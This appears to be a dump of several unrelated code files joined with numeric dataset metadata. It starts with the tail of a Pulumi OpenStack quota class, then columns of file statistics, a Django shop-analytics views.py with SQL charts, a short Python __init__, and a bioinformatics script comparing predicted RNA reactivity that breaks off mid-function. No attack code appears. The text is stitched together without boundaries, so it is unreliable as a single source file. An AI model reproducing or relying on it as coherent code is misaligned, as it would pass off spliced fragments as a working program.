Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> pulumi.Output[int]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> pulumi.Output[int]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> pulumi.Output[int]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@property
@pulumi.getter
def instances(self) -> pulumi.Output[int]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> pulumi.Output[int]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> pulumi.Output[int]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def ram(self) -> pulumi.Output[int]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> pulumi.Output[int]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Output[int]:
"""
Quota value for security groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> pulumi.Output[int]:
"""
Quota value for server groups members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> pulumi.Output[int]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
| 42.158807
| 134
| 0.641577
| 5,090
| 43,803
| 5.303536
| 0.044204
| 0.086386
| 0.094388
| 0.102686
| 0.938878
| 0.933136
| 0.928468
| 0.92243
| 0.914688
| 0.898537
| 0
| 0.003449
| 0.265187
| 43,803
| 1,038
| 135
| 42.199422
| 0.835244
| 0.340913
| 0
| 0.877395
| 1
| 0
| 0.103588
| 0.024605
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.001916
| 0.009579
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
405e508a120ee9c6808a59ababde5f500118f698
| 113
|
py
|
Python
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 18
|
2020-03-04T14:23:08.000Z
|
2022-03-17T10:47:21.000Z
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 57
|
2020-06-04T16:03:44.000Z
|
2021-05-17T20:54:35.000Z
|
Modified_data/SpaceFOM/__init__.py
|
jiajlin/TrickHLA
|
ae704b97049579e997593ae6d8dd016010b8fa1e
|
[
"NASA-1.3"
] | 5
|
2020-08-25T05:51:05.000Z
|
2021-10-01T18:37:38.000Z
|
from .SpaceFOMFederateConfig import *
from .SpaceFOMMTRInteraction import *
from .SpaceFOMRefFrameObject import *
| 37.666667
| 37
| 0.849558
| 9
| 113
| 10.666667
| 0.555556
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097345
| 113
| 3
| 38
| 37.666667
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40b6fd139983cf0c352f7637f9421ca84dcb3d9f
| 20,732
|
py
|
Python
|
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | null | null | null |
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | null | null | null |
paint/views.py
|
atulk17/Paint-App
|
4b56455596d140cee4a9b19c71fe82364c3f3b7c
|
[
"BSD-2-Clause"
] | 1
|
2020-05-31T11:37:48.000Z
|
2020-05-31T11:37:48.000Z
|
from django.shortcuts import render
from .forms import SearchCustomerForm, SearchDistributorForm, SearchProductForm
from django.http import HttpResponse, request
from .models import Customers, Sale_Consists_of, Sales, Delivers, Distributor, Products, Purchase, Sales, Office_Expense
import sqlite3
from django.http import JsonResponse
def home(request):
return render(request,'index.htm')
def analysis(request):
return render(request, 'Analysis.htm')
def newrecord(request):
return render(request, 'NewRecords.htm')
def shoprecord(request):
return render(request, 'Shoprecords.htm')
def chartj(request):
return render(request, 'purchasechart.htm')
def chartjy(request):
return render(request, 'purchasecharty.htm')
def charts(request):
return render(request, 'salechart.htm')
def chartsy(request):
return render(request,'salechartyearly.htm')
def chartoe(request):
return render(request, 'oechart.htm')
def chartoey(request):
return render(request, 'oecharty.htm')
def chartpl(request):
return render(request, 'plchart.htm')
def chartply(request):
return render(request, 'plcharty.htm')
def search_customer(request):
if request.method == "POST":
form=SearchCustomerForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('customer_name')
phone=form.cleaned_data.get('phone')
name='%'+name+'%'
phone='%'+phone+'%'
q = Customers.objects.raw('SELECT * FROM Customers WHERE Contact like %s and Customer_name like %s',[phone,name])
context = {'customer': q}
return render(request, 'customerdetails.htm', context)
else:
q2= Customers.objects.raw('SELECT * FROM Customers')
form = SearchCustomerForm()
return render(request, 'searchc.htm', {'form': form ,'cust':q2})
def search_Distributor(request):
if request.method == "POST":
form=SearchDistributorForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('Distributor_name')
phone=form.cleaned_data.get('phone')
name='%'+name+'%'
phone='%'+phone+'%'
q = Distributor.objects.raw('SELECT * FROM Distributor WHERE Contact_no like %s and Distributor_name like %s',[phone,name])
context = {'distributor': q}
return render(request, 'disdetails.htm', context)
else:
q2=Distributor.objects.raw('SELECT * FROM Distributor')
form = SearchDistributorForm()
return render(request, 'searchd.htm', {'form': form,'dist':q2})
def search_product(request):
if request.method == "POST":
form=SearchProductForm(request.POST)
if form.is_valid():
name=form.cleaned_data.get('product_name')
name='%'+name+'%'
q = Products.objects.raw('SELECT * FROM Products WHERE Product_name like %s',[name])
context = {'product': q}
return render(request, 'prodetails.htm', context)
else:
q2 = Products.objects.raw('SELECT * FROM Products')
form = SearchProductForm()
return render(request, 'searchp.htm', {'form': form,'prod':q2})
def track_delivery(request):
q2=Customers.objects.raw('SELECT C.Customer_id, C.Customer_name, S.Total_amount, S.Date_of_order, S.Invoice_no, SC.Delivery_status from Customers as C, Sales as S, Delivers as SC where C.Customer_id=S.Customer_id_id and S.Invoice_no=SC.Invoice_no_id and SC.Delivery_status = "NOT DELIVERED"')
context = {'del': q2}
return render(request, 'deldetails.htm', context)
def purchasechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def purchasechartyear(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def salechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,7) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def salechartyear(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,4) as "Year", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
Year=[]
Amount=[]
for key in c.fetchall():
Year.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Year,
'data': Amount,
})
def oechart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,7) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def oecharty(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,4) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
return JsonResponse(data={
'labels': Month,
'data': Amount,
})
def profitchart(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,7) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,7) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, 4):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
return JsonResponse(data={
'labels': Month,
'dataa': res_list,
})
def profitcharty(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,4) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,4) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
return JsonResponse(data={
'labels': Month,
'dataa': res_list,
})
def salechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,7) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total sales in %s is less than the sales in %s by a margin of Rs. %d . There is a %.2f%% decline in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total sales in %s is more than the sales in %s by a margin of Rs. %d . There is a %.2f%% increase in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total sales in %s is equal to the sales in %s. There is no change in sales" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def salechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_order,1,4) as "Month", sum(Total_amount) as Amount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total sales in %s is less than the sales in %s by a margin of Rs. %d . There is a %.2f%% decline in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total sales in %s is more than the sales in %s by a margin of Rs. %d . There is a %.2f%% increase in sales" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total sales in %s is equal to the sales in %s. There is no change in sales" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def purchasechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total purchases in %s is less than the purchases in %s by a margin of Rs. %d . There is a %.2f%% decline in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total purchases in %s is more than the purchases in %s by a margin of Rs. %d . There is a %.2f%% increase in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total purchases in %s is equal to the purchases in %s. There is no change in purchases" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def purchasechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as Amount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total purchases in %s is less than the purchases in %s by a margin of Rs. %d . There is a %.2f%% decline in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total purchases in %s is more than the purchases in %s by a margin of Rs. %d . There is a %.2f%% increase in purchases" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total purchases in %s is equal to the purchases in %s. There is no change in purchases" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def oechartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,7) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total Office Expenses in %s is less than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% decline in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total Office Expenses in %s is more than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% increase in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Office Expenses in %s is equal to the Office Expenses in %s. There is no change in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def oechartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Expenditure_date,1,4) as "Month", sum(Amount) as Amount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
Month=[]
Amount=[]
for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total Office Expenses in %s is less than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% decline in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total Office Expenses in %s is more than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% increase in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Office Expenses in %s is equal to the Office Expenses in %s. There is no change in Office expenses" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def profitchartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,7) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,7) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
if(res_list[len(res_list)-1]<res_list[len(res_list)-2]):
mar=abs(res_list[len(res_list)-2]-res_list[len(res_list)-1])
per=abs((mar/res_list[len(res_list)-2])*100)
s=("The total Revenue in %s is less than the Revenue in %s by a margin of Rs. %d . There is a %.2f%% decline in Revenue. The shop is in loss" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(res_list[len(res_list)-1]>res_list[len(res_list)-2]):
mar=abs(res_list[len(res_list)-1]-res_list[len(res_list)-2])
per=abs((mar/res_list[len(res_list)-1])*100)
s=("The total Revenue in %s is more than the Revenue in %s by a margin of Rs. %d . There is a %.2f%% increase in Revenue. The shop is in gain" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Revenue in %s is equal to the Revenue in %s. There is no change in Revenue" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def profitchartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,4) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,4) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
if(res_list[len(res_list)-1]<res_list[len(res_list)-2]):
mar=abs(res_list[len(res_list)-2]-res_list[len(res_list)-1])
per=abs((mar/res_list[len(res_list)-2])*100)
s=("The total Revenue in %s is less than the Revenue in %s by a margin of Rs. %d . There is a %.2f%% decline in Revenue. The shop is in loss" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(res_list[len(res_list)-1]>res_list[len(res_list)-2]):
mar=abs(res_list[len(res_list)-1]-res_list[len(res_list)-2])
per=abs((mar/res_list[len(res_list)-1])*100)
s=("The total Revenue in %s is more than the Revenue in %s by a margin of Rs. %d . There is a %.2f%% increase in Revenue. The shop is in gain" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Revenue in %s is equal to the Revenue in %s. There is no change in Revenue" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
| 39.94605
| 297
| 0.625024
| 3,072
| 20,732
| 4.148438
| 0.057943
| 0.042373
| 0.070621
| 0.037665
| 0.845339
| 0.843063
| 0.812068
| 0.812068
| 0.812068
| 0.812068
| 0
| 0.023484
| 0.223616
| 20,732
| 519
| 298
| 39.94605
| 0.768265
| 0
| 0
| 0.783715
| 0
| 0.124682
| 0.362948
| 0.067029
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081425
| false
| 0
| 0.015267
| 0.030534
| 0.185751
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40d06c7715fd6cd7c01531080f9c708b51464f5e
| 150
|
py
|
Python
|
powspechi/__init__.py
|
m33ra/HI_powspec
|
1a60cd55501b54a1cc391817860e0b80dba6c5f8
|
[
"MIT"
] | 4
|
2019-10-05T16:34:07.000Z
|
2019-10-09T12:22:10.000Z
|
powspechi/__init__.py
|
m33ra/powspechi
|
1a60cd55501b54a1cc391817860e0b80dba6c5f8
|
[
"MIT"
] | null | null | null |
powspechi/__init__.py
|
m33ra/powspechi
|
1a60cd55501b54a1cc391817860e0b80dba6c5f8
|
[
"MIT"
] | null | null | null |
from powspechi.monte_carlos import *
from powspechi.maps_manip import *
from powspechi.powspec_calc import *
from powspechi.powspec_analysis import *
| 30
| 40
| 0.84
| 20
| 150
| 6.1
| 0.5
| 0.42623
| 0.467213
| 0.42623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 41
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
dc04a6e5df4fc905d10b6d6b25ee4079b160679b
| 26,783
|
py
|
Python
|
structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
|
Tsinghua-gongjing/StructureImpute
|
59e33e913998a8841c2cb552828f0f0cc19ebc21
|
[
"MIT"
] | 9
|
2021-11-17T11:27:41.000Z
|
2022-03-04T10:27:37.000Z
|
structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
|
Tsinghua-gongjing/StructureImpute
|
59e33e913998a8841c2cb552828f0f0cc19ebc21
|
[
"MIT"
] | null | null | null |
structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
|
Tsinghua-gongjing/StructureImpute
|
59e33e913998a8841c2cb552828f0f0cc19ebc21
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="ticks")
sns.set_context("poster")
plt.rcParams["font.family"] = "Helvetica"
import sys, os
from nested_dict import nested_dict
import pandas as pd
import numpy as np
from pyfasta import Fasta
import os
import re
import torch
import time
from termcolor import colored
import util
import argparse
from scipy import stats
from matplotlib.backends.backend_pdf import PdfPages
import compare_true_and_predict
def read_validate_predict(validate, predict):
cols = ['tx', 'length', 'start', 'end', 'mean_reactivity', 'null_pct','seq','fragment_shape', 'fragment_shape(true)']
df_validate = pd.read_csv(validate, header=None, sep='\t')
df_validate.columns = cols
df_predict = pd.read_csv(predict, header=None, sep='\t')
df_predict.columns = ['fragment_shape(predict)']
if df_validate.shape[0] != df_predict.shape[0]:
print('validate{} & predict{} entry num not same'.format(df_validate.shape[0], df_predict.shape[0]))
sys.exit()
df_validate['fragment_shape(predict)'] = df_predict['fragment_shape(predict)']
print(df_validate.shape, df_validate.head())
return df_validate
def compare_predict(validation_ls, predict_ls, label_ls, savefn, bases='AC'):
validation_ls = validation_ls.split(':')
predict_ls = predict_ls.split(':')
label_ls = label_ls.split(':')
df_validate_dict = nested_dict(1, list)
for validate,predict,label in zip(validation_ls, predict_ls, label_ls):
df_validate = read_validate_predict(validate, predict)
df_validate_dict[label] = df_validate
df_validate_merge = df_validate_dict[label_ls[0]].merge(df_validate_dict[label_ls[1]], on=['tx', 'start', 'end'])
df_validate_merge['corr'] = [stats.pearsonr(list(map(float, i.split(','))),list(map(float, j.split(','))))[0] for i,j in zip(df_validate_merge['fragment_shape(true)_x'], df_validate_merge['fragment_shape(true)_y'])]
df_validate_merge.sort_values(by=['corr'], inplace=True, ascending=False)
df_validate_merge['mean_reactivity_x_predict'] = [np.mean([i_v for i_v,j_base in zip(list(map(float, i.split(','))), list(j)) if j_base in bases and i_v>=0]) for i,j in zip(df_validate_merge['fragment_shape(predict)_x'], df_validate_merge['seq_x'])]
df_validate_merge['mean_reactivity_y_predict'] = [np.mean([i_v for i_v,j_base in zip(list(map(float, i.split(','))), list(j)) if j_base in bases and i_v>=0]) for i,j in zip(df_validate_merge['fragment_shape(predict)_y'], df_validate_merge['seq_y'])]
print('merge', df_validate_merge.shape, df_validate_merge.head())
pdf = mpl.backends.backend_pdf.PdfPages(savefn)
mean_null_dict = nested_dict(1, list)
for n,(tx,start,end,s1,s2,s3,s4,s5,s6,seq) in enumerate(zip(df_validate_merge['tx'],df_validate_merge['start'],df_validate_merge['end'],df_validate_merge['fragment_shape_x'],df_validate_merge['fragment_shape(true)_x'],df_validate_merge['fragment_shape(predict)_x'],df_validate_merge['fragment_shape_y'],df_validate_merge['fragment_shape(true)_y'],df_validate_merge['fragment_shape(predict)_y'],df_validate_merge['seq_x'])):
title = '{}:{}-{}'.format(tx,start,end)
if n<=100:
s3 = ','.join([i if j in 'AC' else '-1' for i,j in zip(s3.split(','),seq)])
s6 = ','.join([i if j in 'AC' else '-1' for i,j in zip(s6.split(','),seq)])
fig = compare_true_and_predict.plot_bar(shape_ls=[s1,s2,s3,s4,s5,s6], seq=seq, label_ls=['NULL1','True1','Predict1','NULL2','True2','Predict2'], savefn=None, pdf=pdf, title=title, ylim_ls=[[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1]])
mean_null1 = np.mean([j for i,j in zip(list(map(float, s1.split(','))), list(map(float, s2.split(',')))) if i == -1])
mean_null2 = np.mean([j for i,j in zip(list(map(float, s1.split(','))), list(map(float, s3.split(',')))) if i == -1])
mean_null3 = np.mean([j for i,j in zip(list(map(float, s4.split(','))), list(map(float, s5.split(',')))) if i == -1])
mean_null4 = np.mean([j for i,j in zip(list(map(float, s4.split(','))), list(map(float, s6.split(',')))) if i == -1])
mean_null_dict['mean_null_x'].append(mean_null1)
